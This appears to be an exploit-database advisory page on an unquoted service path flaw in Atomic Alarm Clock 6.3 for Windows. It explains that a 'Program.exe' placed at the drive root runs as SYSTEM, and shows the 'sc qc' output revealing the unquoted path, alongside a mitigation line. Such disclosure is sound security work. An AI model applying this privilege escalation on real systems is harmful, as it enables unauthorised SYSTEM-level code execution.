header-logo
Suggest Exploit
vendor:
Atomic Alarm Clock
by:
boku
7.2
CVSS
HIGH
Local Privilege Escalation by unquoted service path owned by 'LocalSystem'
78
CWE
Product Name: Atomic Alarm Clock
Affected Version From: 6.3
Affected Version To: 6.3
Patch Exists: NO
Related CWE: N/A
CPE: a:drive_software:atomic_alarm_clock
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro 1909 (32-bit)
2020

Atomic Alarm Clock x86 6.3 – ‘AtomicAlarmClock’ Unquoted Service Path

The Atomic Alarm Clock service 'timeserv.exe' will load an arbitrary EXE and execute it with SYSTEM integrity. This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. By placing a file named 'Program.exe' on the root drive, an attacker can obtain persistent arbitrary code execution. Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.

Mitigation:

Ensure that all services have a valid path to the executable and that the path is properly quoted.
Source

Exploit-DB raw data:

# Exploit Title: Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-04-17
# Vendor Homepage: http://www.drive-software.com
# Software Link: http://www.drive-software.com/download/ataclock.exe
# Version: 6.3
# Tested On: Windows 10 Pro 1909 (32-bit)
# Vulnerability Type: Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.

# Vulnerability Description:
# The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. 
# This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. 
# By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution. 
# Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.

C:\Users\boku>sc qc AtomicAlarmClock
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AtomicAlarmClock
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Atomic Alarm Clock\timeserv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Atomic Alarm Clock Time
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Navigation

Suggest Exploit

Services By CQR